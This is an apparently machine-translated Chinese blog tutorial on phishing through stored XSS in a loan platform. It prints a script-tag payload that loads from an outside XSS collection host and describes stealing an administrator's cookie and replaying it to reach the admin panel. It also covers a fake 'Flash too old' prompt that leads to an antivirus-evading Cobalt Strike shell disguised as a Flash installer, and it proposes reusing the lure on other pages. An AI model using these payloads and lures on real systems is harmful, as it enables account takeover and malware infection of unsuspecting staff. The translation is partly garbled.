kali渗透测试技术实战 kali linux全部功能教程

简介请注意:本文仅用于技术探讨和研究,笔记中转载的所有终端或服务器均为自建环境渗透。在这项研究中,我将使用Kali Linux作为攻击机器。这里使用的技术只是为了学习和教育的

本文最后更新时间:  2023-03-23 20:20:13

简介

请注意:

本文仅用于技术探讨和研究,笔记中转载的所有终端或服务器均为自建环境渗透。在这项研究中,我将使用Kali Linux作为攻击机器。这里使用的技术只是为了学习和教育的目的。如果所列技术用于任何其他目的,本网站和作者概不负责。

名言:

你对这一行的兴趣决定了你在这一行的成就!

2021最新网络安全渗透测试/安全学习(全套视频、大厂访谈、优秀手册、必备工具包)I >:关注我,私信回复“资讯”

一.导言

网络钓鱼是社会工程攻击的一种,主要通过欺骗和伤害受害者的心理弱点、本能反应、好奇、信任、贪婪等心理陷阱。

网络钓鱼攻击是个人和公司在保护其信息安全时面临的最常见的安全挑战之一。无论是获取密码还是其他敏感信息,黑客都在通过使用电子邮件、社交媒体、电话和任何可能的通信方式来窃取有价值的数据。

网络钓鱼攻击的增加对所有组织都构成了重大威胁。重要的是,如果他们想要保护他们的信息,所有组织都应该知道如何找到一些最常见的网络钓鱼诈骗。还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

这篇文章主要演示了如何使用XSS植入钓鱼,并获得管理员的内部计算机权限!

二。环境介绍

黑客(攻击者):

IP:192.168.1.9

系统:卡利2020.4

卡莉作为cs的服务器!

VPS服务器:

PHP平台地址:
http://test1.dayuixiyou.cn/

钓鱼地址:
http://flash.dayuixiyou.cn

办公室电脑:

系统:windwos7

双网卡:

192.168.175.153

10.10.1.5

目前kali上正在运行Cobalt strike,攻击者在自己的公共VPS服务器上进行后门页面钓鱼。通过渗透,发现thinkphp贷款平台页面存在XSS漏洞。通过插入XSS-js代码,植入链接,黑客最终控制了管理员办公电脑的进程!!

三。XSS示威

示范贷thinkphp平台在公网服务器上!

1.注册帐户密码。

进入个人中心!

注册用户名和密码!

登录用户名和密码后,正常的用户界面!点击设置!

输入结算信息并测试!

2.XSS的弱点是存在的。

输入:

测试结果修改成功!检查下前端…

检查源代码-编辑后,我可以看到没有任何变化。XSS代码仍然存在…表明XSS攻击存在。

3.注册XSS平台

https://xss.pt/xss.php?do=login进入XSS利用平台,google也有很多别的平台!!随意注册一个账号!

创建一个新的项目,随意填写!https://xss.pt/xss.php? Do =登录进入XSS平台,谷歌还有很多其他平台!!随便注册个账号吧!创建一个新项目,并随意填写!

选择Keepsession以保留会话!
下一个!

需要执行的XSS利用代码会弹出…选择标准代码测试!

& lt/tExtArEa >'”& gt& ltsCRiPt sRC=https://xss.pt..aJ & gt& lt/sCrIpT >

4.利用XSS漏洞

& lt/tExtArEa >'”& gt& ltsCRiPt sRC=https://xss.pt/..aJ & gt& lt/sCrIpT >

这一段是有效载荷!将XSS连接信息返回https://xss.pt平台!

提交信息后,您可以看到XSS已经在网络中成功执行

执行成功,那么XSS平台就会收到信息,可见一斑!

5.获取管理员cookie

点击提取现金…

结算申请成功后,XSS执行代码将被转发到后台结算模块!

后台管理员进入管理界面,为客户结算资金时,点击提现申请模块!将执行XSS植入的代码!!

这时,返回管理员的cookie和URL信息!

6.cookie登录背景

扫描目录获取管理后台的登录页面,通过Burp suite分包拦截!

将XSS平台获取的XSS漏洞嵌入到代码返回的包中,修改里面的url和cookie信息!

send执行后,通过cookie进入管理员后台!

复制URL!复制网址!

接入浏览器后,正常进入管理员后台!

四。和XSS一起钓鱼1.建立一个Flash钓鱼页面

在公网服务器上设置钓鱼页面,任何能上网的客户都可以访问这个页面!

2.生成一个免杀后门

使用Cobal Strike在C#语言中生成shell…

用这个shell来混淆,用python的tinyaes模块来混淆。最后用pyinstaller生成exe shell …必须通过国家杀毒软件!(不演示过程)
把flash的名字改成:
flash player _ install _ cn.exe(或者改成update之类吸引人的下载名)

3.修改Flash源代码

这是闪贷平台的源文件目录!!

修改index.html代码并找到href = & # 8221修改为:
Flash Player _ install _ cn.exe
意思是现在点击页面下载就可以自动下载目录下的exe后门文件!

准备一个js文件,这意味着在执行js之后,页面上会提示你:

你的FLASH版本太低了。尝试升级并访问此页面!

并访问此页面:
http://flash.dayuixiyou.cn/

把exe和js都上传到apache的底层,功能网络服务器!
正常读数可以在测试访问中看到。确保intranet管理员可以在执行XSS后访问js文件。从这里开始吧!

4.利用XSS漏洞植入JS

可以看出,在(3)中利用XSS的方法被用于执行插入:

" & gt& lt”
#结尾" >:& lt

当”立即提交”之后直接执行XSS植入的js文件,提示js中的内容!!

然后点击确定,直接跳转到flash页面!

与(3)中的方法一样,您需要在后台管理页面执行XSS,并且您需要结算金额。结算时让管理员点击执行XSS!

5.执行XSS以下载flash

可以看到内网管理员在工作期间登录管理后台。登录管理员用户后,工作职责需要为客户结算金额。点击提现申请后,一般客户的安全意识很差!!

点开之后,看来你的FLASH版本太低了。尝试升级并访问此页面!,一般情况下,点击确认!

确认后跳转到flash页面,逼真的页面!!立即点击下载!!
这里是20.1MB的大小信息,这里只需在html中修改数字和EXE内容大小!

可以看到后门已经下载了,但是我没有修改这里的图标。google或者百度用文件夹改变器修改了flash安装包的图标,比较逼真!!
exe这里完全免杀,杀毒软件也放不出来!!

6.成功的XSS捕鱼

执行!

成功在kali攻击机上的CS上线,可看到获取到了管理员电脑的权限!!在kali攻击机上成功启动CS,可以看到获得了管理员电脑的权限!!

网络渗透测试数据I >:关注我,私信回复“信息”动词 (verb的缩写)摘要

这里通过渗透,发现了某平台的XSS漏洞,利用XSS漏洞植入代码执行,诱骗对方客服或管理员的内网电脑权限!

至少你需要熟悉如何建立一个网站,HTML,js,域名,XSS,免杀,CS4等等。

所以很多人说flash是经典的钓鱼漏洞,整个国家的警惕性会高很多。所以我还是那句老话,提供思路。如果是破解软件,购买网站,利用虚荣心或者贪小便宜的购物页面等。去钓鱼,做各种植入,会钓到多少人?

希望大家提高安全意识,没有网络安全就没有国家安全!

虽然是基本的,但是一定要牢记。

温馨提示:内容均由网友自行发布提供,仅用于学习交流,如有版权问题,请联系我们。